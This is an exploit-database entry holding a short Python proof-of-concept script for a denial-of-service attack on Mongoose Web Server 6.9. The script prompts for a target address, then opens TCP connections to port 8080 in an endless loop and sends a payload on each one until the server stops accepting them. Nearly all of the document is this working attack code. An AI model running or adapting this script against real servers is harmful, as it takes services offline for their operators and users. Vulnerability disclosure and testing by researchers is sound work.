|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47  |  # Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC) # Dork: N/A # Date: 2018-11-11 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://cesanta.com/binary.html # Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dl&os=win # Version: 6.9 # Category: Dos # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC:  # 1) #!/usr/bin/python import socket print """  \\\|///  \\- -// (@ @ )  ----oOOo--(_)-oOOo---- Mongoose Web Server 6.9 Ihsan Sencan  ---------------Ooooo---- ( )  ooooO ) /  ( )(_/ \ (  \_) """ Ip = raw_input("[Ip]: ") Port = 8080 # Default port d=[] c=0 while 1: try: d.append(socket.create_connection((Ip,Port))) d[c].send("BOOM") print "Sie!" c+=1 except socket.error:  print "Done!" raw_input() break  |